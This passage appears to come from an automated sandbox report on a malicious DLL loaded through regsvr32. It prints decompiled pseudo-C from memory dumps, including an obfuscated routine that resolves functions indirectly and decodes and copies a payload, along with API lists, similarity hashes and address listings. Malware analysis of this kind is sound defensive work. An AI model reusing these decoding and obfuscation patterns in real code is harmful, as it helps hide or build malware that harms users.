                                          						if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                          							goto L16;
                                          						}
                                          						goto L14;
                                          					}
                                          					L16:
                                          					_t36 = FindNextFileW(_t61,  &_v608);
                                          					_t31 = 0x2e;
                                          				} while (_t36 != 0);
                                          				_t37 =  *0x1001e684; // 0x2e5faa0
                                          				 *((intOrPtr*)(_t37 + 0x78))(_t61);
                                          				goto L18;
                                          			}























                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$FirstNext
                                          • String ID:
                                          • API String ID: 1690352074-0
                                          • Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                                          • Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
                                          • Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                                          • Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1518329722-0
                                          • Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                                          • Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
                                          • Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                                          • Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E00191C5D(signed int __ebx, signed int __ecx, signed int __edx, signed int __esi, signed int _a4, void* _a8) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				void* _v32;
                                          				signed int _v36;
                                          				signed int _t301;
                                          				signed int _t303;
                                          				signed char _t304;
                                          				void* _t306;
                                          				intOrPtr _t307;
                                          				signed int _t311;
                                          				signed int _t316;
                                          				signed int _t317;
                                          				signed int _t319;
                                          				signed int _t320;
                                          				signed int _t321;
                                          				signed int _t323;
                                          				signed int _t325;
                                          				signed int _t326;
                                          				signed int _t330;
                                          				signed int _t331;
                                          				signed int _t332;
                                          				signed int _t336;
                                          				signed int _t339;
                                          				void* _t342;
                                          				signed int _t345;
                                          				signed int _t348;
                                          				signed int _t352;
                                          				signed int _t359;
                                          				signed int _t360;
                                          				signed int _t381;
                                          				void* _t382;
                                          				signed int _t383;
                                          				signed char _t386;
                                          				void* _t407;
                                          				signed int _t410;
                                          				signed int _t412;
                                          				signed int _t426;
                                          				signed int _t428;
                                          				void* _t429;
                                          				signed int _t450;
                                          				signed int _t468;
                                          				signed int* _t469;
                                          				signed int* _t470;
                                          				signed int* _t473;
                                          				signed int* _t474;
                                          
                                          				_t426 = __esi;
                                          				_t381 = __edx;
                                          				_t360 = __ecx;
                                          				_t450 = _t468;
                                          				_t469 = _t468 + 0xffffffe0;
                                          				_push(__ebx);
                                          				_v36 = __ebx;
                                          				_t407 = _a8;
                                          				_t336 = _v36;
                                          				_push( *((intOrPtr*)(_t407 + 0xc)));
                                          				_pop( *_t5);
                                          				_push( *((intOrPtr*)(_t407 + 4)));
                                          				_pop( *_t7);
                                          				if(_v16 == 1) {
                                          					_v24 = 7;
                                          					_v8 = 1;
                                          					_v12 = 8;
                                          				}
                                          				if(_v16 != 0) {
                                          					if(_v16 != 2) {
                                          						if(_v16 == 4) {
                                          							if( *(_t336 + 0x4355dd) == 0) {
                                          								_t301 =  *((intOrPtr*)(_t336 + 0x441070))( *((intOrPtr*)(_t336 + 0x435970)));
                                          								_v36 = _t360;
                                          								 *(_t336 + 0x4355dd) =  *(_t336 + 0x4355dd) & 0x00000000;
                                          								 *(_t336 + 0x4355dd) =  *(_t336 + 0x4355dd) | _t360 - _v36 | _t301;
                                          								_t360 = _v36;
                                          							}
                                          							if( *(_t336 + 0x435655) == 0) {
                                          								_t301 =  *((intOrPtr*)(_t336 + 0x441058))();
                                          								_v36 = _t360;
                                          								 *(_t336 + 0x435655) =  *(_t336 + 0x435655) & 0x00000000;
                                          								 *(_t336 + 0x435655) =  *(_t336 + 0x435655) ^ _t360 & 0x00000000 ^ _t301;
                                          								_t360 = _v36;
                                          								if( *(_t336 + 0x435406) == 0) {
                                          									_t301 =  *((intOrPtr*)(_t336 + 0x4410a8))(0, 8);
                                          									_v36 = _t426;
                                          									 *(_t336 + 0x435406) = _t301;
                                          									_t426 = _v36;
                                          								}
                                          							}
                                          							_v24 = 1;
                                          							if( *(_t336 + 0x4353f6) == 0) {
                                          								_push( *((intOrPtr*)(_t336 + 0x43562d)));
                                          								if( *(_t336 + 0x4351bb) == 0) {
                                          									_t320 =  *((intOrPtr*)(_t336 + 0x441070))( *((intOrPtr*)(_t336 + 0x435619)));
                                          									_v36 = _t426;
                                          									 *(_t336 + 0x4351bb) =  *(_t336 + 0x4351bb) & 0x00000000;
                                          									 *(_t336 + 0x4351bb) =  *(_t336 + 0x4351bb) ^ (_t426 ^ _v36 | _t320);
                                          									_t426 = _v36;
                                          								}
                                          								_t301 =  *((intOrPtr*)(_t336 + 0x4410a4))();
                                          								 *(_t336 + 0x4353f6) =  *(_t336 + 0x4353f6) & 0x00000000;
                                          								 *(_t336 + 0x4353f6) =  *(_t336 + 0x4353f6) ^ _t450 ^  *_t469 ^ _t301;
                                          								_t450 = _t450;
                                          							}
                                          							_v8 = 0x55;
                                          							if( *(_t336 + 0x435392) == 0) {
                                          								_t301 =  *((intOrPtr*)(_t336 + 0x441060))();
                                          								 *(_t336 + 0x435392) =  *(_t336 + 0x435392) & 0x00000000;
                                          								 *(_t336 + 0x435392) =  *(_t336 + 0x435392) | _t381 & 0x00000000 | _t301;
                                          								_t381 = _t381;
                                          							}
                                          							if( *(_t336 + 0x435a35) == 0) {
                                          								if( *(_t336 + 0x435258) == 0) {
                                          									_t319 =  *((intOrPtr*)(_t336 + 0x441070))( *((intOrPtr*)(_t336 + 0x4352bb)));
                                          									_v36 = _t426;
                                          									 *(_t336 + 0x435258) =  *(_t336 + 0x435258) & 0x00000000;
                                          									 *(_t336 + 0x435258) =  *(_t336 + 0x435258) | _t426 - _v36 | _t319;
                                          									_t426 = _v36;
                                          								}
                                          								_t301 =  *((intOrPtr*)(_t336 + 0x441058))();
                                          								if( *(_t336 + 0x4358ac) == 0) {
                                          									_t317 =  *((intOrPtr*)(_t336 + 0x441058))(_t301);
                                          									_v36 = _t426;
                                          									 *(_t336 + 0x4358ac) =  *(_t336 + 0x4358ac) & 0x00000000;
                                          									 *(_t336 + 0x4358ac) =  *(_t336 + 0x4358ac) | _t426 - _v36 | _t317;
                                          									_t426 = _v36;
                                          									_t301 =  *_t469;
                                          									_t469 =  &(_t469[1]);
                                          								}
                                          								 *(_t336 + 0x435a35) =  *(_t336 + 0x435a35) & 0x00000000;
                                          								 *(_t336 + 0x435a35) =  *(_t336 + 0x435a35) | _t381 -  *_t469 ^ _t301;
                                          								_t381 = _t381;
                                          								if( *(_t336 + 0x435928) == 0) {
                                          									_t301 =  *((intOrPtr*)(_t336 + 0x4410a8))(0, 9);
                                          									 *(_t336 + 0x435928) =  *(_t336 + 0x435928) & 0x00000000;
                                          									 *(_t336 + 0x435928) =  *(_t336 + 0x435928) | _t407 -  *_t469 ^ _t301;
                                          									_t407 = _t407;
                                          								}
                                          							}
                                          							_v12 = 2;
                                          							if( *(_t336 + 0x4357be) == 0) {
                                          								_t301 =  *((intOrPtr*)(_t336 + 0x44105c))();
                                          								_v36 = _t426;
                                          								 *(_t336 + 0x4357be) =  *(_t336 + 0x4357be) & 0x00000000;
                                          								 *(_t336 + 0x4357be) =  *(_t336 + 0x4357be) ^ (_t426 & 0x00000000 | _t301);
                                          								_t426 = _v36;
                                          							}
                                          						}
                                          					} else {
                                          						if( *(_t336 + 0x435356) == 0) {
                                          							_t301 =  *((intOrPtr*)(_t336 + 0x4410a8))(0,  *((intOrPtr*)(_t336 + 0x435910)));
                                          							_v32 = _t381;
                                          							 *(_t336 + 0x435356) = 0 ^ _t301;
                                          							_t381 = _v32;
                                          						}
                                          						_v24 = 3;
                                          						if( *(_t336 + 0x43530f) == 0) {
                                          							_t301 =  *((intOrPtr*)(_t336 + 0x441060))();
                                          							_v36 = _t426;
                                          							 *(_t336 + 0x43530f) =  *(_t336 + 0x43530f) & 0x00000000;
                                          							 *(_t336 + 0x43530f) =  *(_t336 + 0x43530f) | _t426 & 0x00000000 | _t301;
                                          							_t426 = _v36;
                                          						}
                                          						if( *(_t336 + 0x4352d3) == 0) {
                                          							_t63 = _t336 + 0x4353aa; // 0x86a99e
                                          							_t325 = _t63;
                                          							if( *(_t336 + 0x43580a) == 0) {
                                          								_t326 =  *((intOrPtr*)(_t336 + 0x4410a4))( *((intOrPtr*)(_t336 + 0x4356c9)), _t325);
                                          								_v32 = _t426;
                                          								 *(_t336 + 0x43580a) = 0 ^ _t326;
                                          								_t426 = _v32;
                                          								_t325 =  *_t469;
                                          								_t469 = _t469 - 0xfffffffc;
                                          							}
                                          							_t301 =  *((intOrPtr*)(_t336 + 0x441064))(_t325);
                                          							 *(_t336 + 0x4352d3) =  *(_t336 + 0x4352d3) & 0x00000000;
                                          							 *(_t336 + 0x4352d3) =  *(_t336 + 0x4352d3) ^ (_t381 & 0x00000000 | _t301);
                                          							_t381 = _t381;
                                          						}
                                          						_v8 = 0x11;
                                          						if( *(_t336 + 0x4355ad) == 0) {
                                          							_t77 = _t336 + 0x43589c; // 0x86ae90
                                          							_t301 =  *((intOrPtr*)(_t336 + 0x441068))(_t77);
                                          							 *(_t336 + 0x4355ad) =  *(_t336 + 0x4355ad) & 0x00000000;
                                          							 *(_t336 + 0x4355ad) =  *(_t336 + 0x4355ad) | _t360 & 0x00000000 ^ _t301;
                                          							_t360 = _t360;
                                          						}
                                          						if( *(_t336 + 0x43547e) == 0) {
                                          							if( *(_t336 + 0x4358a8) == 0) {
                                          								_t323 =  *((intOrPtr*)(_t336 + 0x4410a4))( *((intOrPtr*)(_t336 + 0x435038)));
                                          								 *(_t336 + 0x4358a8) =  *(_t336 + 0x4358a8) & 0x00000000;
                                          								 *(_t336 + 0x4358a8) =  *(_t336 + 0x4358a8) | _t381 & 0x00000000 ^ _t323;
                                          								_t381 = _t381;
                                          							}
                                          							_t301 =  *((intOrPtr*)(_t336 + 0x4410a4))( *((intOrPtr*)(_t336 + 0x43574a)));
                                          							 *_t469 = _t450;
                                          							 *(_t336 + 0x43547e) = 0 ^ _t301;
                                          							_t450 = 0;
                                          						}
                                          						_v12 = 4;
                                          						if( *(_t336 + 0x4350cc) == 0) {
                                          							_t301 =  *((intOrPtr*)(_t336 + 0x441058))();
                                          							 *(_t336 + 0x4350cc) =  *(_t336 + 0x4350cc) & 0x00000000;
                                          							 *(_t336 + 0x4350cc) =  *(_t336 + 0x4350cc) ^ _t450 & 0x00000000 ^ _t301;
                                          							_t450 = _t450;
                                          						}
                                          						if( *(_t336 + 0x4350a8) == 0) {
                                          							_t301 =  *((intOrPtr*)(_t336 + 0x441058))();
                                          							if( *(_t336 + 0x435313) == 0) {
                                          								_t321 =  *((intOrPtr*)(_t336 + 0x441060))(_t301);
                                          								_v32 = _t426;
                                          								 *(_t336 + 0x435313) =  *(_t336 + 0x435313) & 0x00000000;
                                          								 *(_t336 + 0x435313) =  *(_t336 + 0x435313) | _t426 & 0x00000000 ^ _t321;
                                          								_t426 = _v32;
                                          								_t301 =  *_t469;
                                          								_t469 = _t469 - 0xfffffffc;
                                          							}
                                          							_v32 = _t407;
                                          							 *(_t336 + 0x4350a8) = _t301;
                                          							_t407 = _v32;
                                          							if( *(_t336 + 0x435884) == 0) {
                                          								_t301 =  *((intOrPtr*)(_t336 + 0x4410a0))( *((intOrPtr*)(_t336 + 0x4355c1)),  *((intOrPtr*)(_t336 + 0x435595)),  *((intOrPtr*)(_t336 + 0x435416)),  *((intOrPtr*)(_t336 + 0x43503c)),  *((intOrPtr*)(_t336 + 0x435549)), 0x4b, 0x1000);
                                          								_v32 = _t407;
                                          								 *(_t336 + 0x435884) = _t301;
                                          								_t407 = _v32;
                                          							}
                                          						}
                                          					}
                                          					 *_t469 =  *_t469 ^ _t381;
                                          					_t382 = _t381;
                                          					if( *(_t336 + 0x435a39) == 0) {
                                          						_t301 =  *((intOrPtr*)(_t336 + 0x4410a0))( *((intOrPtr*)(_t336 + 0x435950)), 2,  *((intOrPtr*)(_t336 + 0x4357da)), 0x3d, 0x12e,  *((intOrPtr*)(_t336 + 0x435821)),  *((intOrPtr*)(_t336 + 0x43511a)), _t382);
                                          						 *_t469 = _t450;
                                          						 *(_t336 + 0x435a39) = 0 ^ _t301;
                                          						_t450 = 0;
                                          						_t469 = _t469 - 0xfffffffc;
                                          					}
                                          					_v36 = _t336;
                                          					_t303 = _t301 & 0x00000000 | _t336 ^ _v36 ^ _v20;
                                          					_t339 = _v36;
                                          					_t304 = _t303 / _v12;
                                          					_t383 = _t303 % _v12;
                                          					if( *(_t339 + 0x435651) == 0) {
                                          						_t311 =  *((intOrPtr*)(_t339 + 0x441044))(_t339 + 0x435544, _t339 + 0x435243, _t383);
                                          						_v32 = _t360;
                                          						 *(_t339 + 0x435167) =  *(_t339 + 0x435167) & 0x00000000;
                                          						 *(_t339 + 0x435167) =  *(_t339 + 0x435167) ^ (_t360 - _v32 | _t311);
                                          						_t360 = _v32;
                                          						_t473 = _t469 - 0xfffffffc;
                                          						_push( *((intOrPtr*)(_t339 + 0x441044))(_t339 + 0x435352, _t339 + 0x435685,  *_t469));
                                          						_pop( *_t244);
                                          						_push(_v36);
                                          						_pop( *_t246);
                                          						_push(0);
                                          						if( *(_t339 + 0x4351fb) == 0) {
                                          							_t316 =  *((intOrPtr*)(_t339 + 0x441064))(_t339 + 0x43568a);
                                          							_v36 = _t426;
                                          							 *(_t339 + 0x4351fb) =  *(_t339 + 0x4351fb) & 0x00000000;
                                          							 *(_t339 + 0x4351fb) =  *(_t339 + 0x4351fb) ^ (_t426 & 0x00000000 | _t316);
                                          							_t426 = _v36;
                                          						}
                                          						_t304 =  *((intOrPtr*)(_t339 + 0x441070))();
                                          						 *(_t339 + 0x435651) =  *(_t339 + 0x435651) & 0x00000000;
                                          						 *(_t339 + 0x435651) =  *(_t339 + 0x435651) | _t450 & 0x00000000 | _t304;
                                          						_t450 = _t450;
                                          						_t383 = 0 ^  *_t473;
                                          						_t469 =  &(_t473[1]);
                                          					}
                                          					_v20 = _v20 - _t383;
                                          					_t342 = _t339;
                                          					_v32 = _t407;
                                          					_v28 = _v28 & 0x00000000;
                                          					_v28 = _v28 | _t407 - _v32 ^ _t383;
                                          					_t410 = _v32;
                                          					if( *(_t342 + 0x4355a9) == 0) {
                                          						_t304 =  *((intOrPtr*)(_t342 + 0x441060))();
                                          						_v32 = _t360;
                                          						 *(_t342 + 0x4355a9) = 0 ^ _t304;
                                          					}
                                          					_t428 = _t426 & 0x00000000 | _t342 -  *_t469 | _a4;
                                          					_t345 = _t342;
                                          					_t412 = _t410 & 0x00000000 ^ (_t383 -  *_t469 | _t428);
                                          					_t386 = _t383;
                                          					if( *(_t345 + 0x435492) == 0) {
                                          						_t304 =  *((intOrPtr*)(_t345 + 0x441054))(_t345 + 0x435482);
                                          						_v36 = _t412;
                                          						 *(_t345 + 0x435492) = 0 ^ _t304;
                                          						_t412 = _v36;
                                          					}
                                          					_t429 = _t428 - 1;
                                          					_push(_t345);
                                          					do {
                                          						 *_t469 = _t345;
                                          						_t348 = 0;
                                          						if(((0 ^ _t412) & _v24) == 0) {
                                          							_t429 = _t429 + 1;
                                          							_v36 = _t348;
                                          							_t304 = _t304 & 0x00000000 | _t348 & 0x00000000 | _v12;
                                          							_t348 =  *(_t304 + _t429) & 0x000000ff;
                                          						}
                                          						_v32 = _t348;
                                          						_t345 = _v32;
                                          						asm("rol edx, cl");
                                          						_t386 = (_t386 & 0x00000000 ^ _t348 - _v32 ^ _v8) & _t345;
                                          						asm("lodsb");
                                          						_t304 = _t304 | _t386;
                                          						 *_t412 = _t304;
                                          						_t412 = _t412 + 1;
                                          						_t291 =  &_v20;
                                          						 *_t291 = _v20 - 1;
                                          					} while ( *_t291 != 0);
                                          					_t352 =  *_t469;
                                          					_t470 = _t469 - 0xfffffffc;
                                          					if( *((intOrPtr*)(_t352 + 0x435254)) == 0) {
                                          						_t307 =  *((intOrPtr*)(_t352 + 0x44105c))();
                                          						 *_t470 = _t450;
                                          						 *((intOrPtr*)(_t352 + 0x435254)) = _t307;
                                          						_t450 = 0;
                                          					}
                                          					_v32 = _t412;
                                          					_t306 = memcpy(_v32, _t429 + 1, 0 ^ _v28);
                                          					_pop( *_t299);
                                          					return _t306;
                                          				} else {
                                          					_t359 =  *_t469;
                                          					_t474 =  &(_t469[1]);
                                          					_t330 =  *((intOrPtr*)(_t359 + 0x441044))(_t359 + 0x4359b8, _t359 + 0x43528c);
                                          					_push(0);
                                          					 *_t474 = _t450;
                                          					 *(_t359 + 0x4357e6) = _t330;
                                          					if( *(_t359 + 0x435998) == 0) {
                                          						if( *(_t359 + 0x435851) == 0) {
                                          							_t332 =  *((intOrPtr*)(_t359 + 0x4410a0))(0,  *((intOrPtr*)(_t359 + 0x435528)),  *((intOrPtr*)(_t359 + 0x43551c)), 0xd, 0x1e0, 0x194,  *((intOrPtr*)(_t359 + 0x435629)));
                                          							 *(_t359 + 0x435851) =  *(_t359 + 0x435851) & 0x00000000;
                                          							 *(_t359 + 0x435851) =  *(_t359 + 0x435851) ^ _t360 ^  *_t474 ^ _t332;
                                          							_t360 = _t360;
                                          						}
                                          						_t330 =  *((intOrPtr*)(_t359 + 0x44105c))();
                                          						_v36 = _t381;
                                          						 *(_t359 + 0x435998) =  *(_t359 + 0x435998) & 0x00000000;
                                          						 *(_t359 + 0x435998) =  *(_t359 + 0x435998) | _t381 & 0x00000000 | _t330;
                                          					}
                                          					if( *(_t359 + 0x4356d1) == 0) {
                                          						_t331 =  *((intOrPtr*)(_t359 + 0x4410a0))( *((intOrPtr*)(_t359 + 0x435501)), 2,  *((intOrPtr*)(_t359 + 0x43569d)),  *((intOrPtr*)(_t359 + 0x4351d7)), 0xa1,  *((intOrPtr*)(_t359 + 0x43544e)), 0x20);
                                          						_v36 = _t360;
                                          						 *(_t359 + 0x4356d1) =  *(_t359 + 0x4356d1) & 0x00000000;
                                          						 *(_t359 + 0x4356d1) =  *(_t359 + 0x4356d1) | _t360 & 0x00000000 ^ _t331;
                                          						return _t331;
                                          					}
                                          					return _t330;
                                          				}
                                          			}




















































                                          0x00191ea3
                                          0x00191eaa
                                          0x00191eb0
                                          0x00191eb9
                                          0x00191ebc
                                          0x00191ebc
                                          0x00191ec0
                                          0x00191ecc
                                          0x00191ed3
                                          0x00191ed9
                                          0x00191ed9
                                          0x00191eda
                                          0x00191ee8
                                          0x00191eea
                                          0x00191ef1
                                          0x00191efd
                                          0x00191f04
                                          0x00191f0a
                                          0x00191f0a
                                          0x00191f12
                                          0x00191f1b
                                          0x00191f23
                                          0x00191f2f
                                          0x00191f36
                                          0x00191f3c
                                          0x00191f3c
                                          0x00191f43
                                          0x00191f4b
                                          0x00191f52
                                          0x00191f58
                                          0x00191f58
                                          0x00191f59
                                          0x00191f67
                                          0x00191f69
                                          0x00191f75
                                          0x00191f7c
                                          0x00191f82
                                          0x00191f82
                                          0x00191f8a
                                          0x00191f90
                                          0x00191f9d
                                          0x00191fa0
                                          0x00191fa6
                                          0x00191fae
                                          0x00191fb5
                                          0x00191fbb
                                          0x00191fc0
                                          0x00191fc3
                                          0x00191fc3
                                          0x00191fc6
                                          0x00191fcd
                                          0x00191fd3
                                          0x00191fdd
                                          0x00192004
                                          0x0019200a
                                          0x00192011
                                          0x00192017
                                          0x00192017
                                          0x00191fdd
                                          0x0019201a
                                          0x00192205
                                          0x00192208
                                          0x00192210
                                          0x00192234
                                          0x0019223c
                                          0x00192243
                                          0x00192249
                                          0x00192253
                                          0x00192253
                                          0x00192256
                                          0x00192262
                                          0x00192264
                                          0x00192267
                                          0x00192267
                                          0x00192271
                                          0x00192286
                                          0x0019228c
                                          0x00192294
                                          0x0019229b
                                          0x001922a1
                                          0x001922ad
                                          0x001922c5
                                          0x001922c6
                                          0x001922c9
                                          0x001922cc
                                          0x001922d2
                                          0x001922db
                                          0x001922e4
                                          0x001922ea
                                          0x001922f2
                                          0x001922f9
                                          0x001922ff
                                          0x001922ff
                                          0x00192302
                                          0x0019230e
                                          0x00192315
                                          0x0019231b
                                          0x0019231e
                                          0x00192321
                                          0x00192321
                                          0x0019232a
                                          0x0019232d
                                          0x0019232e
                                          0x00192336
                                          0x0019233a
                                          0x0019233d
                                          0x00192347
                                          0x00192349
                                          0x0019234f
                                          0x00192356
                                          0x0019235c
                                          0x00192369
                                          0x0019236b
                                          0x00192375
                                          0x00192377
                                          0x0019237f
                                          0x00192388
                                          0x0019238e
                                          0x00192395
                                          0x0019239b
                                          0x0019239b
                                          0x0019239e
                                          0x0019239f
                                          0x001923a0
                                          0x001923a2
                                          0x001923ab
                                          0x001923af
                                          0x001923b1
                                          0x001923b2
                                          0x001923be
                                          0x001923c3
                                          0x001923c3
                                          0x001923c7
                                          0x001923d5
                                          0x001923d8
                                          0x001923da
                                          0x001923dc
                                          0x001923dd
                                          0x001923df
                                          0x001923e1
                                          0x001923e2
                                          0x001923e2
                                          0x001923e2
                                          0x001923e9
                                          0x001923ec
                                          0x001923f6
                                          0x001923f8
                                          0x00192400
                                          0x00192407
                                          0x0019240d
                                          0x0019240d
                                          0x0019240e
                                          0x0019241c
                                          0x00192420
                                          0x00192427
                                          0x00191ca2
                                          0x00191ca8
                                          0x00191cab
                                          0x00191cbc
                                          0x00191cc2
                                          0x00191cc4
                                          0x00191ccb
                                          0x00191cd9
                                          0x00191ce2
                                          0x00191d04
                                          0x00191d10
                                          0x00191d17
                                          0x00191d1d
                                          0x00191d1d
                                          0x00191d1e
                                          0x00191d24
                                          0x00191d2c
                                          0x00191d33
                                          0x00191d39
                                          0x00191d44
                                          0x00191d67
                                          0x00191d6d
                                          0x00191d75
                                          0x00191d7c
                                          0x00000000
                                          0x00191d82
                                          0x00191d85
                                          0x00191d85

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: U
                                          • API String ID: 0-3372436214
                                          • Opcode ID: 549d6ae3d9d3b009460b0904d1c15cf0bb4ee64f365c2683f7c08c4a584efb00
                                          • Instruction ID: 6002d50ee074c845ae7e72559e3ecef794cf817bc4532e33a8d4ac9bbf45cda2
                                          • Opcode Fuzzy Hash: 549d6ae3d9d3b009460b0904d1c15cf0bb4ee64f365c2683f7c08c4a584efb00
                                          • Instruction Fuzzy Hash: 91324C72800618DFEF149FA0C88979A7BB1FF68315F0891A9DD0DAE199C77815A4CF78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E00191D89(signed int __eax, void* __ecx, signed int __edx, intOrPtr* __edi, signed int __esi) {
                                          				signed int _t281;
                                          				signed int _t283;
                                          				void _t284;
                                          				void* _t286;
                                          				intOrPtr _t287;
                                          				signed int _t291;
                                          				signed int _t296;
                                          				signed int _t297;
                                          				signed int _t299;
                                          				signed int _t300;
                                          				signed int _t301;
                                          				signed int _t303;
                                          				signed int _t305;
                                          				signed int _t306;
                                          				signed int _t309;
                                          				signed int _t311;
                                          				void* _t318;
                                          				void* _t321;
                                          				signed int _t324;
                                          				void* _t327;
                                          				signed int _t331;
                                          				void* _t337;
                                          				signed int _t353;
                                          				void* _t354;
                                          				signed int _t355;
                                          				signed char _t358;
                                          				intOrPtr* _t376;
                                          				void* _t379;
                                          				signed int _t382;
                                          				void* _t384;
                                          				signed int _t398;
                                          				signed int _t400;
                                          				void* _t401;
                                          				signed int _t423;
                                          				signed int* _t439;
                                          				signed int* _t440;
                                          				signed int* _t443;
                                          
                                          				_t398 = __esi;
                                          				_t376 = __edi;
                                          				_t353 = __edx;
                                          				_t337 = __ecx;
                                          				_t280 = __eax;
                                          				 *__edi =  *__edi + __ecx;
                                          				 *0x43974500 =  *((intOrPtr*)(0x43974500)) + __eax;
                                          				 *__eax =  *__eax + __eax;
                                          				if( *__eax == 0) {
                                          					_push(__eax);
                                          					_push(1);
                                          					_t311 =  *0x008766E9();
                                          					 *_t439 = _t423;
                                          					 *0x0086AA33 = 0 ^ _t311;
                                          					_t423 = 0;
                                          					_t280 = _t311 & 0x00000000 |  *_t439;
                                          					_t439 =  &(_t439[1]);
                                          				}
                                          				_t281 =  *0x008766EC();
                                          				if( *0x0086AF9C == 0) {
                                          					_push(_t281);
                                          					_push(0x86af84);
                                          					_t309 =  *((intOrPtr*)(0x8766ec))();
                                          					 *(_t423 - 0x20) = _t398;
                                          					 *0x0086AF9C =  *0x0086AF9C & 0x00000000;
                                          					 *0x0086AF9C =  *0x0086AF9C | _t398 ^  *(_t423 - 0x20) ^ _t309;
                                          					_t398 =  *(_t423 - 0x20);
                                          					_pop( *_t19);
                                          					_t281 = _t309 & 0x00000000 |  *(_t423 - 0x1c);
                                          				}
                                          				 *0x0086ACDD =  *0x0086ACDD & 0x00000000;
                                          				 *0x0086ACDD =  *0x0086ACDD | _t376 -  *_t439 ^ _t281;
                                          				_t379 = _t376;
                                          				if( *((intOrPtr*)(_t423 - 0xc)) != 2) {
                                          					if( *((intOrPtr*)(_t423 - 0xc)) == 4) {
                                          						if( *0x0086AC75 == 0) {
                                          							_push( *0x0086B008);
                                          							_t281 =  *0x00876708();
                                          							 *(_t423 - 0x20) = _t337;
                                          							 *0x0086AC75 =  *0x0086AC75 & 0x00000000;
                                          							 *0x0086AC75 =  *0x0086AC75 | _t337 -  *(_t423 - 0x20) | _t281;
                                          							_t337 =  *(_t423 - 0x20);
                                          						}
                                          						if( *0x0086ACED == 0) {
                                          							_t281 =  *0x008766F0();
                                          							 *(_t423 - 0x20) = _t337;
                                          							 *0x0086ACED =  *0x0086ACED & 0x00000000;
                                          							 *0x0086ACED =  *0x0086ACED ^ _t337 & 0x00000000 ^ _t281;
                                          							_t337 =  *(_t423 - 0x20);
                                          							if( *0x0086AA9E == 0) {
                                          								_push(8);
                                          								_push(0);
                                          								_t281 =  *0x00876740();
                                          								 *(_t423 - 0x20) = _t398;
                                          								 *0x0086AA9E = _t281;
                                          								_t398 =  *(_t423 - 0x20);
                                          							}
                                          						}
                                          						 *(_t423 - 0x14) = 1;
                                          						if( *0x0086AA8E == 0) {
                                          							_push( *0x0086ACC5);
                                          							if( *0x0086A853 == 0) {
                                          								_push( *0x0086ACB1);
                                          								_t300 =  *((intOrPtr*)(0x876708))();
                                          								 *(_t423 - 0x20) = _t398;
                                          								 *0x0086A853 =  *0x0086A853 & 0x00000000;
                                          								 *0x0086A853 =  *0x0086A853 ^ (_t398 ^  *(_t423 - 0x20) | _t300);
                                          								_t398 =  *(_t423 - 0x20);
                                          							}
                                          							_t281 =  *0x0087673C();
                                          							 *0x0086AA8E =  *0x0086AA8E & 0x00000000;
                                          							 *0x0086AA8E =  *0x0086AA8E ^ _t423 ^  *_t439 ^ _t281;
                                          							_t423 = _t423;
                                          						}
                                          						 *(_t423 - 4) = 0x55;
                                          						if( *0x0086AA2A == 0) {
                                          							_t281 =  *0x008766F8();
                                          							 *0x0086AA2A =  *0x0086AA2A & 0x00000000;
                                          							 *0x0086AA2A =  *0x0086AA2A | _t353 & 0x00000000 | _t281;
                                          							_t353 = _t353;
                                          						}
                                          						if( *0x0086B0CD == 0) {
                                          							if( *0x0086A8F0 == 0) {
                                          								_push( *0x0086A953);
                                          								_t299 =  *((intOrPtr*)(0x876708))();
                                          								 *(_t423 - 0x20) = _t398;
                                          								 *0x0086A8F0 =  *0x0086A8F0 & 0x00000000;
                                          								 *0x0086A8F0 =  *0x0086A8F0 | _t398 -  *(_t423 - 0x20) | _t299;
                                          								_t398 =  *(_t423 - 0x20);
                                          							}
                                          							_t281 =  *((intOrPtr*)(0x8766f0))();
                                          							if( *0x0086AF44 == 0) {
                                          								_push(_t281);
                                          								_t297 =  *((intOrPtr*)(0x8766f0))();
                                          								 *(_t423 - 0x20) = _t398;
